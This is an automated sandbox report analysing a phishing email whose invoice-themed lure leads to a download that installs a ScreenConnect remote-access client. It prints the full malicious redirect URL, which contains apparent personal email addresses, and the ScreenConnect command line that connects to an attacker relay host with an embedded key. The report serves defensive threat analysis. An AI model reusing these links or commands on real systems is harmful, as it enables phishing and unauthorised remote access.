Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml

Overview

General Information

Sample name:phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml
Analysis ID:1593000
MD5:fe4a96153ab544caf5354670893ad386
SHA1:11208f0dfdef4b053e0fbc0d2890620fa118ab94
SHA256:5cf1bebd34724d875bcc4419d6b0137794c207d52bf70904d0e9bdc0865b1a18
Infos:

Detection

ScreenConnect Tool
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
AI detected suspicious elements in Email content
Changes security center settings (notifications, updates, antivirus, firewall)
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 5980 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6880 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "53F80022-4EA9-497D-ADFC-B51F6B36E8C3" "55C219FA-EE3D-4DAB-B2D6-DD10726AC0B1" "5980" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 4300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1092 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • RemittanceForms (1).exe (PID: 6064 cmdline: "C:\Users\user\Downloads\RemittanceForms (1).exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)
        • msiexec.exe (PID: 3936 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 6824 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2184 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6596 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 6644 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 6736 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6516 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7968 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 8120 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • RemittanceForms.exe (PID: 4416 cmdline: "C:\Users\user\Downloads\RemittanceForms.exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)
  • RemittanceForms.exe (PID: 7508 cmdline: "C:\Users\user\Downloads\RemittanceForms.exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)
    • msiexec.exe (PID: 7600 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7576 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 1776 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 50CA2B6AF1D72CC80C4E11E477922C45 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7664 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID5DB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6346343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 6624 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 12F154F86D29205A07CD9883F3F7AAB3 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7740 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 658C20DC4570CE36B0E2CFA7882ABE33 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 4284 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8C89C74C56A8241057E69ABE1029F40F C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 4336 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI20FD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6365687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 5088 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C1CF189F56AA756A7464B123F5466459 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8136 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 85D94624DDB7360BF8B7EA65934AC6CF C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 4660 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8F57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6393796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7700 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding FAAB4D8D67AEAB9EA3FB9C311B04B13B MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 6696 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=0dff7030-637d-4802-a9cf-5f63d3c8abe9&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&t=NewBuild" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7904 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d631616b-045d-46ad-b654-67b074b7884f" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • RemittanceForms.exe (PID: 3132 cmdline: "C:\Users\user\Downloads\RemittanceForms.exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)
  • RemittanceForms.exe (PID: 6848 cmdline: "C:\Users\user\Downloads\RemittanceForms.exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)
    • msiexec.exe (PID: 6004 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\Downloads\Unconfirmed 804247.crdownloadJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Windows\Temp\~DF42CD5E763AF0112E.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DF402DAAA47C81A5E6.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF0ECFDAA9E240F7F8.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DFF4B271A08BFF7223.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Click to see the 26 entries
            SourceRuleDescriptionAuthorStrings
            00000014.00000002.1542049999.0000000005790000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000014.00000002.1546459519.00000000075E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000011.00000000.1515151680.0000000000EC6000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000014.00000002.1533504706.0000000002F41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    0000001C.00000000.1584484803.0000000000712000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      Click to see the 5 entries
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 5980, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6824, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\Downloads\RemittanceForms.exe (copy)ReversingLabs: Detection: 23%

                      Phishing

                      barindex
                      Source: EmailJoe Sandbox AI: Page contains button: 'Review Document' Source: 'Email'
                      Source: EmailJoe Sandbox AI: Email contains prominent button: 'review document'
                      Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://clicktime.cloud.postoffice.net/clicktime.p... This script appears to be a part of a security solution that checks the safety of URLs before allowing users to access them. While the overall intent seems legitimate, there are several concerning behaviors that contribute to the high-risk score:1. The script uses obfuscated URLs and query strings, which is a high-risk indicator (+3 points).2. It sends user data (email address) to an external domain, which poses a data exfiltration risk (+3 points).3. The script interacts with multiple domains, some of which may be of unknown or dubious reputation, adding to the suspicion (+1 point).While the script is likely part of a security solution, the use of obfuscation and data transmission to external domains raises significant security concerns. Further review and validation of the script's purpose and the trustworthiness of the involved domains would be necessary to determine the true risk level.
                      Source: EmailJoe Sandbox AI: Detected potential phishing email: The email contains suspicious URLs pointing to multiple redirects and questionable domains like 'bahraincv.com'. The subject line and content follow classic phishing patterns mentioning 'remittance' and 'eDocument' to create urgency. The email contains an excessive amount of tracking links and redirects through clicktime.cloud
                      Source: EmailClassification: Invoice Scam
                      Source: https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954HTTP Parser: No favicon
                      Source: https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954HTTP Parser: No favicon
                      Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.16:65430 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:65431 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:65432 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:65433 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:65440 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:65441 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:65445 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.226.254:443 -> 192.168.2.16:65449 version: TLS 1.2
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:
                      Source: C:\Windows\System32\svchost.exeFile opened: d:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeFile opened: c:
                      Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:

                      Networking

                      barindex
                      Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL Service
                      Source: global trafficTCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
                      Source: global trafficTCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
                      Source: global trafficTCP traffic: 192.168.2.16:65429 -> 162.159.36.2:53
                      Source: global trafficTCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
                      Source: global trafficTCP traffic: 192.168.2.16:65429 -> 162.159.36.2:53
                      Source: global trafficTCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
                      Source: global trafficTCP traffic: 192.168.2.16:65429 -> 162.159.36.2:53
                      Source: global trafficTCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
                      Source: global trafficTCP traffic: 192.168.2.16:65429 -> 162.159.36.2:53
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
                      Source: global trafficDNS traffic detected: DNS query: clicktime.cloud.postoffice.net
                      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
                      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                      Source: global trafficDNS traffic detected: DNS query: cloud.postoffice.net
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: fub.direct
                      Source: global trafficDNS traffic detected: DNS query: bahraincv.com
                      Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                      Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: slplegalfinance.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65449 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65430
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57367 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65435 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57350 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65440
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65444 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65441
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57364 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65452 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65439
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65438 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65433
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65441 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65434
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65431
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57353 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65432
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65437
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65438
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65435
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65436
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65451
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65443 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65452
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65450
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57365 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57342 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65437 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65444
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65445
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65442
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65440 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65448
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65449
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65446
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57356 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65446 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57362 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57348 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57345 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65432 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57351 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65453
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65454
